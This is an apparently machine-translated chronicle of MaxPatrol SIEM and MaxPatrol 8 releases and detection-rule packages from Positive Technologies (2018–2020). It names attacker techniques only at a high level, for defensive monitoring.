The most laborious task when working in a SIEM system is to process false positives. MaxPatrol SIEM 6 users will be able to add exceptions to threat detection rules in a couple of clicks, which will quickly eliminate repeated false positives. To do this, the user needs to note in the events parameters to which the rule will not respond in the future, for example, the address of the network node or the name of a specific user.

Another change: now MaxPatrol SIEM users will receive notifications about the need to configure the system or about new examination packages - right in the interface. By clicking on such a notification, the user will see the corresponding section of the product. New examination packages are now marked with a special marker.

In the next version, users can create widgets from tabular lists. This will help track the update of lists and, if necessary, quickly respond to what is happening. For example, you can monitor the replenishment of the list of employees whose accounts were active at night or on weekends, or track the list of email addresses from which employees receive a lot of spam.

The following version also adds support for Windows Server 2016 and Windows Server 2019 operating systems for deploying MaxPatrol SIEM.

SIEM systems have become one of the key technologies in providing information security and the main tool for the work of security operations centers (SOC). The number of companies using MaxPatrol SIEM has reached 260 over the past five years. In Positive Technologies' overall 2019 financial result, MaxPatrol SIEM accounts for about 30%.

Launch of CyberART event monitoring services based on MaxPatrol SIEM

Cyber ​ ​ defense services operator CyberART (part of InnoSTage Group of Companies) has launched commercial services for monitoring information security events based on MaxPatrol SIEM . InnoSTage announced this on June 8, 2020. Read more here.

Download a package to identify attempts to pin attackers to Linux-based infrastructures

The MaxPatrol incident detection system SIEM has been loaded with an examination package designed to identify suspicious changes in system objects on nodes OS from the family. Linux Now MaxPatrol SIEM users can detect the actions of an attacker who has already penetrated into - IT infrastructure his attempts to gain a foothold in it, elevate privileges or hide traces. This was announced on May 27, 2020 by the company. Positive Technologies

Linux systems are a goal for attackers: they often act as a web or servers can contain business-critical assets, for example, databases SAP or "." 1C The attackers' interest in them is also explained by the fact that Linux systems, as a rule, deploy on the perimeter of the organization, so hacking them often immediately leads attackers to the internal network. To help companies with Linux infrastructure ensure security, Positive Technologies experts have developed a set of specific ways to detect threats.

Earlier, an expertise package has already been loaded into the MaxPatrol SIEM incident detection system to identify attacks on Linux operating systems. The updated detection rule series complements the previous ones.

The rules included in the eighteenth examination package detect the use of the Credential data Access and Persistence techniques using the MITRE ATT&CK matrix and help detect attempts by intruders:

  • obtain information that allows you to log into the system on behalf of a legitimate user (for example, SSH keys of an OS user);
  • Modify system files, such as OS startup scripts, OS configuration files, system libraries, or executable files to ensure continuous, unobstructed access (backdoor) to a compromised system or elevate privileges.

Thus, users will be able to detect an attacker who has already entered the system and detect his further progress. Detecting suspicious changes to system objects may be the last opportunity to notice an attacker on a particular system. Otherwise, cybercriminals will be able to get all the necessary privileges in order to securely gain a foothold, and then it will become almost impossible to detect them.

In addition, Positive Technologies experts updated the previous examination package, the changes affected the convenience of working with the rules when processing incidents.

Solar JSOC identifies ten targeted attacks with MaxPatrol SIEM

On May 13, 2020, Rostelecom-Solar announced that Solar JSOC had identified ten targeted attacks using MaxPatrol SIEM. Read more here.

Download Suspicious Network Scripting Package for Remote Access with Palo Alto Networks

On May 8, 2020, Positive Technologies announced that the examination package for detecting network anomalies during remote work received a second update. It now covers five more scenarios, including cases of suspicious network activity when organizing remote access using the Palo Alto Networks firewall.

According to a survey of IT and information security specialists conducted by Positive Technologies, the Palo Alto Networks firewall is one of the five most popular ways to organize remote access in large companies. Therefore, Positive Technologies specialists developed rules for detecting threats that are relevant for such a system, and loaded them into MaxPatrol SIEM.

Now MaxPatrol SIEM detects brute force attacks on the VPN subsystem of the Palo Alto firewall (this can prevent attackers from taking over the password to connect to the corporate network) and detects duplicate VPN connections to the firewall, which indicates illegitimate access.

For those companies where remote access is organized using the Palo Alto firewall or other popular firewalls, the scenario of identifying direct VPN connections between two client nodes is relevant. Such suspicious activity, among other things, indicates that the employee's device is compromised from an external network.

File:Aquote1.png
In a month, we managed to collect a set of rules to identify anomalies in the operation of the most popular systems for organizing remote access: OpenVPN, RDG, Cisco ASA, Check Point and Palo Alto firewalls, - comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies. - Taking into account two updates, the examination package covers 16 scenarios.
File:Aquote2.png

The update of the expertise package is also relevant for companies where remote access is organized using Remote Desktop Gateway. Now MaxPatrol SIEM detects cases when attackers move inside the network over RDP: the product detects connections via RDG to a network node from which there are RDP connections to other nodes. Prompt response to such activity will prevent the development of an attack within the network.

Another scenario that requires a prompt response and is identified using an examination package is the detection of repeated connections on the same username to a VPN server based on the OCWindows Server.

MaxPatrol 8 Release

On May 7, 2020, Positive Technologies announced the release of the next version of the MaxPatrol 8 security control and compliance system. Internal testing conducted by Positive Technologies specialists confirmed that by optimizing scanning algorithms, the speed of the product in Compliance mode increased by an average of 30%.

One of the tasks of the MaxPatrol 8 development team was to reduce the time for generating reports. On internal tests on big data, it was possible to get an acceleration of about 30 times - by adding the ability to generate reports in individual processes (up to five at the same time), and thanks to the implemented fault tolerance mechanisms, report generation continues even with an abnormal kernel reboot.

MaxPatrol 8

The release includes functionality that is designed to simplify the work with the product and reduce manual configuration of the solution. For example, users can now select the required standards when setting up a scan profile. You can also include and exclude each data type separately when generating a report. In addition, when creating a scan schedule, you can set filtering by subnet membership - this will help separate asset inventory and vulnerability scanning.

File:Aquote1.png
The task of the development team is to speed up the checks. Updates have already been released that have increased product performance in Compliance mode. This is especially true in the case of large installations. At the same time, we are not going to stop and also plan to reduce the scan time in Audit mode,

- comments Pavel Bukhtiyarov, MaxPatrol 8 Development Manager
File:Aquote2.png

As part of efforts to improve product performance for big data, the consolidation of scan results has been optimized. Consolidation has doubled - over the network, as well as by about 50% - to the file. The results depend on the speed of the hard drive: the faster it is, the higher the performance.

In addition to releases with updated functionality, scheduled updates to MaxPatrol 8 are released twice a week: the vulnerability base is being replenished, support for new systems is being implemented, new security standards are being added and the existing expertise is being updated.

Download an examination package to detect suspicious activity on the network

On April 14, 2020, Positive Technologies announced that an examination package was loaded into MaxPatrol SIEM to identify suspicious activity on the network, which is especially important due to the remote work of users. The package covers nine anomalies requiring prompt investigation.

Due to the transition of companies to a remote mode of operation, attackers have opportunities to penetrate the local network. In order to identify illegitimate connections due to the perimeter of the company in time, Positive Technologies experts released an examination package with a set of rules for quickly detecting signs of intruders' activity.

Examples of anomalies that MaxPatrol SIEM now detects are:

  • network connections through tunnels,
  • attempts to connect to critical network segments,
  • duplicate remote sessions,
  • multiple failed attempts to connect to a host ON with Open,VPN
  • multiple failed attempts to connect firewall Cisco to the ASA,
  • enabling an access rule on the local firewall to allow an RDP connection,
  • RDP connection from a network node OS from a family, Unix
  • adding a user account to a significant Windows information security group,
  • Reconnect via VPN to a Windows host.

File:Aquote1.png
Since threats related to remote operation are relevant for most companies, we decided to help them strengthen network security with our expertise. The examination package to identify suspicious activity on the network associated with the remote work of users will be replenished weekly, covering more and more possible attackers' techniques,
comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies
File:Aquote2.png

Positive Technologies conducts a special survey of IT and information security specialists to select priorities in developing ways to detect threats. First of all, experts will develop correlation rules for the most common systems for organizing remote access.

Loading Microsoft SQL Server Attack Detection Package

On April 6, 2020, Positive Technologies announced that the next examination package in MaxPatrol SIEM will help users identify suspicious activity in Microsoft SQL Server database management systems. The package includes rules that allow you to detect an attack at different stages - from reconnaissance in a compromised system to affecting individual processes in the DBMS and the system as a whole.

Microsoft SQL Server is used by 64% of large business and public sector companies. Since the DBMS |stores critical company data (financial statements, personal data of customers and employees, information about suppliers and obligations), it can become the focus of cybercriminals. This is confirmed by research by Positive Technologies: at the end of 2019, in 60% of all incidents, it was the theft of information that was the motive for the attackers.

In order for MaxPatrol SIEM users to be able to identify the facts of compromising the Microsoft SQL database before losing critical data, Positive Technologies experts have prepared a special examination package. It includes 23 rules for correlation of information security events, which allow detecting suspicious activity, for example: changing DBMS parameters that affect system security; obtaining logins and passwords of DBMS accounts; High number of failed login attempts Creating a database backup disabling an audit to hide actions; Backing up a database encryption key or certificate Read and edit the Windows registry.

File:Aquote1.png
We have already added the second examination package aimed at identifying attacks on popular DBMS. Our team monitors the current types of attacks on such systems so that MaxPatrol SIEM users can identify the fact of compromise before the attacker gains access to confidential data or disables the system and business processes.
comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies
File:Aquote2.png

Download a 55-rule package to identify signs of common cybercriminal tools

On March 19, 2020, Positive Technologies announced that the next (fifteenth) examination package with 55 rules was loaded into MaxPatrol SIEM to identify signs of the work of common cybercriminals' tools. Detection rules are aimed at detecting multifunctional tools - frameworks often used by attackers, including in targeted attacks. The expertise package will help MaxPatrol SIEM users identify the active actions of attackers on the network before they achieve the targets of the attack.

MaxPatrol SIEM

Attackers use frameworks to perform tasks at various stages of the attack, from gaining access to the network to stealing data and affecting the IT infrastructure. To do this, frameworks can use the built-in utilities of operating systems or run their own malicious modules.

The rules in the examination package detect the activity of individual modules of common tools. In particular, among these tools, Cobalt Strike (used by cybercriminals for hidden communication, phishing attacks and attacks through web applications, for anchoring to resources and developing presence within the network; the Cobalt grouping attacked banks with it), Koadic and Sliver (freely distributed software with a large set of functions, from remote execution of commands to privilege escalation), SharpSploit (a set of tools for post-exploitation), SharpWMI (software that uses the Windows Management Instrumentation mechanism to remotely execute commands through subscriptions to WMI events), Rubeus (a tool for attacking infrastructure using the Kerberos protocol for authentication).

File:Aquote1.png
Our research on hacker frameworks shows that one tool can combine several approaches that complicate the detection of its work. One of the popular attack methods is living off the land, when attackers use legitimate tools that are already present in the attacked system to attack. The second method gaining popularity is bring your own land, when attackers create and deliver their own tools to the hacked node. We took these methods into account when developing detection rules that detect the activity of hacker tools at different stages, including at the time of launching their modules or sending commands,
comments Anton Tyurin, Head of Expert Services at PT Expert Security Center
File:Aquote2.png

MaxPatrol SIEM 5.1

On March 12, 2020, Positive Technologies released an updated version of the MaxPatrol SIEM incident detection system. Upgrading to MaxPatrol SIEM 5.1 will allow information security specialists to reduce response time to similar incidents, flexibly manage user roles and increase data processing speed.

MaxPatrol SIEM 5.1

According to the developer, the transition to the seventh version databases Elasticsearch increased the speed of the product by more than a third. The previous version of MaxPatrol SIEM processed up to 30 thousand events per second (EPS), in the updated version the EPS indicator exceeds 40 thousand per installation. Due to the Elasticsearch database architecture, MaxPatrol SIEM 5.1 users can quickly retrieve archived data and work with it without the need to recover events from. backups

MaxPatrol SIEM 5.1 introduced a flexible model for managing user roles. If you previously set two roles in the system, Administrator or Operator, then in the version presented, SIEM administrators will be able to create additional roles, giving or restricting access to certain product sections. This functionality is especially relevant for companies with a hierarchical or geographically distributed infrastructure, when it is necessary to enable users to work only with data that belongs to their monitoring area, according to Positive Technologies.

According to the developer, the updated version of MaxPatrol SIEM has another way to detect an attack that occurred in the past. Previously, the system retrospectively detected incidents using compromise indicators, now it is also possible according to correlation rules (rules for detecting threats). So, by creating a new rule or downloading the next examination package, users can check the events received earlier for security threats in them.

The use and loading of examination packages has become more convenient. Two clicks are enough to install the package from the knowledge base, and a description of the package with recommendations for configuring and responding to incidents is available right in the product interface, Positive Technologies emphasized.

To help users reduce the labor cost of responding to similar suspicious events, MaxPatrol SIEM implemented the ability to configure their aggregation into one incident (previously incidents were merged only automatically). To do this, the user needs to set aggregation conditions for any event parameters. For example, several consecutive responses to attempts to match a password to one account can be set as one incident.

To analyze and process information security events from different systems, events must be brought to a single format. For this, SIEM systems use normalization formulas. Previously, MaxPatrol SIEM users saw only events already reduced to a single format. With the updated version, they can view the "raw" events before they normalize. This is important because systems connected to SIEM are regularly updated, which can affect the format of the transmitted data. Analysis of "raw" events will help MaxPatrol SIEM users identify errors and take them into account in normalization formulas in order to obtain all the necessary data to identify incidents in full, according to Positive Technologies.

To upgrade to MaxPatrol SIEM 5.1, contact Positive Technologies partners or technical support.

Loading the detection package of 15 popular reconnaissance techniques

Users of the MaxPatrol SIEM system can now identify attackers at the stage when they collect data on a compromised network in order to develop their attack. This was announced on January 28, 2020 by Positive Technologies. To do this, MaxPatrol SIEM has loaded an expertise package with rules for detecting attacks carried out using the "Intelligence" (Discovery) tactics using the MITRE ATT&SCB model. [1]..

After gaining permanent access to the victim's network, attackers need to determine where in the infrastructure they are, what surrounds them and what they can control. During reconnaissance, attackers collect data on a compromised system and internal network, and this helps them navigate to decide how to proceed. To do this, attackers often use the built-in tools of operating systems.

Updated Examination Package [2] includes detection rules for 15 popular reconnaissance techniques. Now users will be able to detect the activity of cybercriminals even during their attempts to obtain a list of domain accounts, password policy information, a list of installed applications and services, and information about the status of protection tools.

File:Aquote1.png
It is not easy to distinguish the activity of attackers who conduct reconnaissance from the legitimate requests of ordinary users. If attackers act under a real user account and use built-in utilities, then their activity is usually lost in the event stream. This examination package will help draw the attention of information security specialists to events that, at first glance, may not arouse suspicion,
comments Anton Tyurin, Head of Expert Services at PT Expert Security Center
File:Aquote2.png

The Exploration Tactics Examination Package (Discovery) is the fifth package with attack detection rules based on the MITRE ATT&CK model; a total of 12 tactics are described in the ATT&CK matrix. Packages previously loaded into MaxPatrol SIEM continue to be replenished with rules as attack detection methods appear [3] So, simultaneously with the release of the fifth examination package, the first package from the series received 14 correlation rules to identify code execution techniques and bypass protection.

2019

Loading an Expert Review Package to Detect Attacks on Linux Operating Systems

On November 26, 2019, Positive Technologies announced that an expertise package was loaded into the MaxPatrol SIEM incident detection system to identify attacks on Linux operating systems. It helps detect suspicious network activity of applications and accounts, which will prevent the development of an attack.

Linux is a popular operating system in the markets of cloud services, supercomputers, and web servers. According to a study by W3Techs, Linux supports 70% of websites out of the most popular 10 million domains by Alexa rating. Such servers can become a point of penetration of attackers into the organization's network if there are vulnerabilities in the web applications deployed on them. To help companies with Linux infrastructure ensure its security, Positive Technologies experts have developed ways to detect popular threats.

File:Aquote1.png
Linux systems often act as Internet servers, including large organizations. This explains the interest of cybercriminals in them: hacking Linux on the perimeter often leads the attacker to the internal network of the enterprise. Moreover, the standard tools of a typical Linux system are very convenient for the further development of the attack. To thwart attackers, we developed a series of detection rules for MaxPatrol SIEM,
comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies
File:Aquote2.png

The added examination package combined rules aimed at detecting suspicious actions on IT assets with the Linux operating system. They allow you to identify the use of several techniques using the MITRE ATT&CK matrix, which are used by attackers for persistence, discovery and interaction with the command and control. So, the rules find:

  • Launch web shell, reverse shell, bind shell remote connection tools that are used by attackers to control the target system during the pinning step.
  • the activity of utilities on behalf of service accounts that attackers can use to obtain information about a compromised node and its network environment during the reconnaissance stage;
  • System calls that are specific to creating tunneled connections (they are needed by attackers to create a communication channel with a compromised node).

The following examination packages for Linux will be released in 2020 and will identify attackers by suspicious changes in system objects and user actions.

Release of an expert review package to identify attacks on the SAP ERP enterprise management system

On October 28, 2019, Positive Technologies released the MaxPatrol SIEM expertise package designed to identify attacks on the SAP ERP enterprise management system. The rules included in it will help detect suspicious user activity in the system. This will detect the presence of an attacker in SAP ERP before he steals critical business data or money.

MaxPatrol SIEM
File:Aquote1.png
Since ERP systems are always an object of increased interest for cybercriminals, we have formed an expert team that specializes in investigating business system vulnerabilities and developing ways to detect threats in them. The specialists of this group are deeply immersed in the architecture of all popular business systems, including SAP ERP, they know how attackers "break" such systems, track changes in hacking scenarios and the emergence of new tools. Based on this knowledge, they create specialized examination packages.

Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies
File:Aquote2.png

The package includes 13 rules for correlation of information security events. They allow you to identify the activity of attackers in SAP ERP, which looks like legitimate actions of users, but in fact allows attackers to disguise themselves as much as possible in the system, elevate account privileges, gain administrator rights or access to confidential information. Among such actions:

  • Use a temporarily unlocked account to log into SAP
  • assigning privileges to yourself by the user or administrator,
  • copying confidential information from reports or tables,
  • issue a report with confidential information,
  • log on to SAP under the account name of the dismissed employee,
  • Download a large amount of data from a report or table.

Simultaneously with the release of the next examination package, the previous package of rules for detecting attacks on SAP ERP was replenished with another 12 detection rules. They will help identify the following threats:

  • Denial of service attack
  • collection by attackers of information about registered programs, system vulnerabilities, resolved commands;
  • Attempts to register malware
  • execution of OS commands by an attacker without authorization in the system;
  • disabling event logging (leads to inability to detect the activity of the attacker);
  • Redirect traffic to the SAP server to the dummy server.

In MaxPatrol SIEM, you can configure rules based on system classes in SAP ERP to reduce false positives. For example, it is recommended that you activate the rule for notification of the use of a temporarily unlocked account for SAP login for test class and production class systems and not use it for development class systems.

Since February 2019, MaxPatrol SIEM users have already received eight examination packages that allow you to quickly identify brute force attempts, anomalies in user activity, attacks on critical business systems, and the use of tactics by attackers using the MITRE ATT&CK model.

Loading an Expert Review Package to Detect Attacks on Oracle Database

On September 5, 2019, the company Positive Technologies announced that SIEM another examination package has been loaded into MaxPatrol. [4] event correlation rules information security identify suspicious activity in management systems. This databases Oracle will help users quickly localize attacks, preventing or data breaches disabling. DBMS

According to the analytical company, Gartner Oracle is the leader in the global management systems market. data DBMS, as a rule, store personal data employees and customers, financial and payment information, intellectual property; all this may be of interest to intruders. According to the analysis of current cyber threats for the second quarter of 2019, Positive Technologies analysts note that more than half of all cybercrimes during this period were committed precisely with the aim of stealing information. At the same time, the five most frequently stolen data included personal, credentials and data, payment cards as well as commercial secrets and. medical information They accounted for 88% of all stolen data.

File:Aquote1.png
The purpose of an attacker's attack on DBMS can be not only access to confidential data, but also to disable the system in order to hide its actions or simply cause damage. Since the DBMS is often connected to many other systems, a failure of its health can lead to a complete shutdown of the entire business process. Therefore, it is critical to protect your databases.
' comments Anton Stolyarov, Head of Database Security at Positive Technologies '
File:Aquote2.png

To prevent data leaks and Oracle Database outages, the R&D Positive Technologies team created a special examination package with 13 correlation rules. With their help, MaxPatrol SIEM users can identify the following suspicious actions, each of which requires investigation:

  • determining the version of the DBMS (this is the first action of an attacker in an attack on the system);
  • selection of the database name (clearly indicates the beginning of the attack on the DBMS);
  • Modify, delete, or add audit table entries (deception or attempt by an attacker to conduct a false trail investigation)
  • Audit operations - disables or removes an audit, its system rules, or its detailed audit policy
  • Audit Privileged User Actions (SYSDBA)
  • reading tables containing passwords.

MaxPatrol SIEM 5.0

On July 29, 2019, Positive Technologies announced an update to the MaxPatrol SIEM incident detection system. Version (5.0) allows retrospective analysis and monitoring of information security in distributed infrastructures. Also, the product has designers of correlation rules and reports and a number of improvements that simplify the operation of the system operator.

Constructor for creating new multi-click correlation rules in MaxPatrol SIEM 5.0

According to the developer, one of the key changes is the correlation rule builder: the MaxPatrol SIEM user can create his own rules in several clicks without using any special programming language. The designer uses macros to quickly substitute often used or difficult to write fragments of program code on their own. The set of pre-installed macros is regularly replenished and can be expanded by the user on his own.

The system has the opportunity to conduct retrospective analysis on indicators of compromise. With it, MaxPatrol SIEM will help detect an attack that occurred in the past and prevent its further development. The product contains a daily replenished database of Positive Technologies indicators, and also supports compromise indicators developed by Kaspersky Lab and Group-IB. The user of the system must once activate the function of checking information security events using compromise indicators, and then MaxPatrol SIEM automatically launches a retrospective analysis every time the indicator base is replenished, Positive Technologies emphasized.

Monitoring capabilities have expanded for companies with a large hierarchical infrastructure: you can receive up-to-date data on the state of information security throughout the organization at any time and identify distributed attacks on the infrastructure of an individual unit or entire enterprise. The system toolkit allows you to visualize the architecture and hierarchy of deployed MaxPatrol SIEM configurations and configure transparent rules for the exchange of information between them, according to Positive Technologies.

Toolbar for transferring data from subpartitions to the parent organization in MaxPatrol SIEM 5.0

According to the developer's statement, in the presented version of MaxPatrol SIEM, users will be able to generate their own reports with data on assets, events and incidents at the selected time interval (while the storage period recommended by the system manufacturer is three months, in archives - up to six months). The information is loaded into the report in the form of widgets (standard and custom widgets are available). The structure and appearance of the report are configured in a convenient designer with a familiar interface similar to Microsoft Word.

As noted in Positive Technologies, other improvements have been made to improve the convenience of working with the product. Data visualization options have become embroidered: additional diagrams and a tabular form of information presentation on dashboards have appeared. The most current operator scenarios have been simplified: for example, in the presented version, the user can create tasks for collecting events and scanning assets by copying existing ones, which made it possible to reduce the time to implement SIEM in a large infrastructure by almost half. Another addition: the ability to compare the states of an asset, information about which was collected at different points in time, or view all successive changes in its state between these moments. This will reduce labor costs when investigating incidents or analyzing the reasons for changing the level of security, as well as reduce the number of tools required for this.

File:Aquote1.png
"MaxPatrol SIEM is already a mature product. Therefore, we focused on simplifying processes that were previously complex and took a long time. This task, for example, is handled by the constructors of correlation rules and reports that appeared in the updated version, "
File:Aquote2.png

Loading the examination package to detect the horizontal movement of attackers in the infrastructure

On July 16, 2019, the company Positive Technologies announced that SIEM a second examination package was loaded into MaxPatrol, identifying attacks using one of the MITRE ATT&CK model tactics for. operating system Windows Thanks to this, MaxPatrol SIEM users can detect activity not malefactors only using the "Execute" and "Bypass protection" tactics, but also the "Horizontal movement" tactics. This allows you to detect attempts to expand the presence of attackers on the network before they gain control over. infrastructure

Attackers use horizontal movement techniques to gain access to and manage remote systems on the network, install malware, and gradually expand their presence in the infrastructure. The main goal of attackers is to identify administrators on the network, their computers, key assets and data, in order to ultimately gain full control over the infrastructure. The examination package includes 18 correlation rules that help identify the most relevant techniques, the developer noted.

File:Aquote1.png
"It is critical to detect the activity of the attacker during the initial stages of horizontal movement. If he takes over administrative privileges, he will be able to access any accounts and servers and thus quickly expand his presence to control the infrastructure. For MaxPatrol SIEM users, we have developed a set of rules that identify the most common attacker steps, "

noted Anton Tyurin, Head of Expert Services at PT Expert Security Center
File:Aquote2.png

According to the developer, the examination package loaded into MaxPatrol SIEM allows you to identify the following actions of attackers as part of horizontal movement:

  • Illegitimate connection to systems via to the protocol Remote Desktop Protocol (RDP).
  • Attempts to intercept a user session using the RDP protocol.
  • Use administrator-level accounts to remotely access systems via the Server Message Block (SMB) protocol to transfer and run files.
  • Remotely copy files to the victim's system to deploy hacker tools and remotely execute them.
  • Use Distributed Component Object Model (DCOM) binding software. With its help, attackers working on behalf of a user with appropriate privileges can remotely execute commands.
  • Use the Windows Remote Management (WinRM) administration mechanism to work with remote systems, such as running an executable file, changing the registry, or Windows applications.

In addition, the package includes rules that identify attacker techniques related to the ATT&CK matrix to the "Execution" tactics. The practice of investigations conducted by the PT Expert Security Center team shows that such techniques are also used for horizontal movement. For example, remotely creating tasks, using the WinExec administration utility to execute commands and expand presence, using Windows Management Instrumentation (WMI) to manage and access remote systems, and trying to access file resources on remote systems.

As noted in Positive Technologies, this is the second examination package from a special series, in the creation of which the PT Expert Security Center team participates - to cover all 12 tactics of the MITRE ATT&CK matrix. Each packet in the series will be aimed at detecting attacks using one or more tactics.

The examination packages loaded into MaxPatrol SIEM are updated with rules as new techniques, tactics and attack procedures emerge. So, simultaneously with the release of the examination package to detect horizontal movement, the first package from the series is supplemented with two correlation rules, the developer emphasized.

Loading the examination package to detect attacks using the MITRE ATT&CK model in Windows

On June 4, 2019, it became known that SIEM an updated examination package was uploaded to MaxPatrol: the rules for correlating events INFORMATION SECURITY in its composition are aimed at detecting activity malefactors using the tactics Execution ("Execution") and Defense Evasion ("Protection Bypass") according to the MITRE ATT&CK model for. operating system Windows MaxPatrol SIEM users can now detect active actions of an attacker after penetrating it. IT infrastructure

MITRE ATT&CK is a knowledge base with a description of tactics, techniques and procedures for attacking attackers. Specialists from the Positive Technologies Security Expert Center (PT Security Expert Center) will create a special series of expertise packages for MaxPatrol SIEM, each of which detects attacks using one or more tactics in accordance with the ATT&CK for Enterprise matrix. PT Expert Security Center plans to gradually cover all 12 matrix tactics.

The first package in the series includes 15 information security event correlation rules to help identify the most current attack techniques inherent in the "Execution" and "Defense Bypass" tactics. The "Execution" tactic includes techniques that attackers use to execute code on compromised systems. They are used, among other things, for horizontal movement to increase access to remote systems in the network. The "Protection Bypass" tactic combines techniques by which an attacker can hide malicious activity and avoid detection by means of protection.

{{quote 'author = comments Alexey Novikov, director of the Positive Technologies (PT Expert Security Center) security expert center|Classic SIEM systems are not able to detect attacks by attackers that use zero-day exploits, so it is more expedient to "catch" them at subsequent stages of the attack. The classic step of attackers is to execute malicious code and try to bypass the means of protection in order to successfully achieve their goals. Therefore, first of all, we have prepared an examination package covering the tactics "Execution" and "Protection Bypass" according to the MITRE ATT&CK model. As a rule, these tactics are used during the stages of intruder penetration into the infrastructure, }}

Correlation rules, among other things, identify techniques using the living off the land (LOTL) method: when attackers use legitimate tools that are already present in the attacked system to attack. This method is increasingly used APT groupings; for example, the Cobalt Group and MuddyWater groupings used the Windows-built Connection Manager Profile Installer utility to run malicious. ON The LOTL method allows you to act under the guise of legitimate work of a system administrator, which reduces the likelihood of detecting an attack with traditional security tools and, therefore, blocking it.

By the end of 2019, MaxPatrol SIEM will download examination packages to identify Initial Access, Persistence data , Credential Access, and Lateral Movement tactics. All examination packages will be replenished with rules as techniques, tactics and attack procedures are discovered.

Download an examination package to detect an anomaly in user activity in Microsoft Active Directory

On April 10, 2019, Positive Technologies announced the download of the expertise package to MaxPatrol SIEM, which allows you to detect anomalies in user activity in Microsoft Active Directory. Such activities within the network may indicate the development of an attack on the organization's IT infrastructure, which can lead to unlimited control in managing accounts and computers on the local network.

MaxPatrol SIEM

The emerging correlation rules included in the examination package identify the actions of an attacker by profiling user activity. For each account and network node in the infrastructure, a behavior model is automatically formed based on the history of legitimate actions. When the user performs an action that deviates from the model, MaxPatrol SIEM will register an anomaly.

As of April 2019, three scenarios have been implemented:

  • logging on to Windows,
  • Accessing shared network resources and named pipes
  • request session tickets for authentication via Kerberos.

If any of the above scenarios is successful and implemented on behalf of an account or network node that has not performed such actions for a long time, the MaxPatrol SIEM operator will receive an information security incident notification describing the type and key attributes of the anomaly.

Positive Technologies experts plan to gradually expand the set of correlation rules to detect abnormal activity in the infrastructure. Within a month, a rule will be added to detect suspicious processes running on the host under the account name with maximum privileges on the system.

Improve the accuracy of brute-force attempts

On March 1, 2019, Positive Technologies announced that another examination package was loaded into the MaxPatrol SIEM incident detection system, which makes it possible to more effectively identify attempts to hack accounts by selecting a login and password (or by brute force, brute force). The correlation rules included in the package have improved the accuracy of detecting brute-force incidents and reduced system memory consumption by 20%.

Positive Technologies specialists have revised the concept of brute-force identification. As a result, rules have been written to help MaxPatrol SIEM users identify hacking attempts using the minimum amount of information: data on authentication attempts, brute-force objects and subjects, and infrastructure features.

If the attack on a specific subject or from a specific object is prolonged, MaxPatrol SIEM will create one incident per day (the creation frequency can be changed), and in the incident itself it will save statistics on all attempts to select credentials associated with the participants in the attack. This reduces the number of notifications, greatly simplifies and speeds up the analysis of the incident.

With the presented examination package, it became possible to create whitelists of network nodes and users who use login and password enumeration techniques for legitimate purposes, and automatically disable the triggering of rules for incidents with their participation. For example, among them there may be nodes of vulnerability scanners, shared accounts, network nodes in DMZ.

The rules were optimized in order to more evenly distribute the load between MaxPatrol SIEM components and tested on a stream of 30,000 events per second. As a result, memory consumption is reduced by 20% compared to the processing of a similar event stream by previous correlation rules.

2018

MaxPatrol SIEM is certified for use in the Republic of Belarus

On June 21, 2018, it became known that the system for monitoring information security events and detecting incidents MaxPatrol SIEM successfully passed tests for compliance with the requirements of the technical regulations of the Republic of Belarus "Information Technologies. Information security tools. Information Security "(TR 2013/027/BY) as mass-produced products.

Now MaxPatrol SIEM is available for purchase in the republic. The certificate is valid until May 29, 2023.

During the certification, the MaxPatrol SIEM product itself was tested and its production status was analyzed. In particular, the functioning of the quality management system in the development and production of MaxPatrol SIEM, the availability of production facilities and a testing laboratory, technological equipment and controls, and personnel qualification were checked.

MaxPatrol SIEM Architecture

Product certification allows Belarusian companies to use MaxPatrol SIEM to create systems for protecting information, the distribution or provision of which is limited, as well as to create security systems for critical informatization objects and ensure the integrity and authenticity of electronic documents in state information systems.

File:Aquote1.png
author '= Alexander Pankov, Director for Business Development in the Republic of Belarus '
This is a necessary step to bring MaxPatrol SIEM to the Belarusian market. We see a serious interest in the product among government agencies, banks, industrial enterprises and are confident that MaxPatrol SIEM will help quickly identify attacks and thus increase their level of security.
File:Aquote2.png

Positive Technologies plans to gradually bring to the Belarusian market all expert services ― from penetration tests and security audits to the response and investigation of security incidents, as well as the company's full portfolio of products. As of June 21, 2018, three Positive Technologies products were certified at the Operational and Analytical Center under the President of the Republic of Belarus: MaxPatrol 8, MaxPatrol SIEM and PT Application Firewall. In the republic, Positive Technologies is represented by the official distributor - Axoft.

Release 4.0

Positive Technologies on April 26, 2018 presented the next version of the system for detecting information security incidents in real time ― MaxPatrol SIEM 4.0. The updated product received a full-fledged mechanism for obtaining and updating information security expertise, has expanded capabilities for enriching asset data and detecting attacks in traffic. This ensures high accuracy and speed of detecting the actions of an attacker on the corporate network and countering new types of threats, the company said.

A feature of the presented version of the system was the regular automated transfer to it of competencies in the field of detecting information security incidents in the form of algorithms that allow detecting even complex atypical attacks. The appropriate sets of rules and recommendations are formed by a team of the Positive Technologies Security Expert Center (PT Expert Security Center), which continuously analyzes current threats, examines the full cycle of attacks and develops ways to detect and prevent them. Sets of rules and recommendations are combined into examination packages and transferred to the Positive Technologies Knowledge Base (PT KB), which is part of MaxPatrol SIEM. Next, the user of the system can select packages of interest in the PT KB interface and apply them as part of his product installation.

Updates regularly delivered to PT KB include off-the-shelf correlation rules for incident detection, up-to-date normalization and aggregation rules, and recommendations for fine-tuning audits on event sources to accurately identify attacks and investigate identified incidents.

The mechanism was tested on a previous version of the system when rules were added to it aimed at detecting advanced cyber attacks on Microsoft Active Directory. So far, Positive Technologies plans to release expert packages at least once every two months. By the end of 2018, the time gap between them is expected to be reduced to one month. In some cases, there is an online release of rule sets outside the schedule: for example, during global attacks of the WannaCry or NotPetya level.

MaxPatrol SIEM 4.0 optimizes the enrichment mechanisms of asset data - key elements of the IT infrastructure model in MaxPatrol SIEM. Among other things, knowledge about the asset is now automatically supplemented with data about the software and hardware of information resources, about operating systems, installed updates, infrastructure configuration received from Microsoft System Center Configuration Manager (SCCM) and the MaxPatrol 8 security monitoring system.

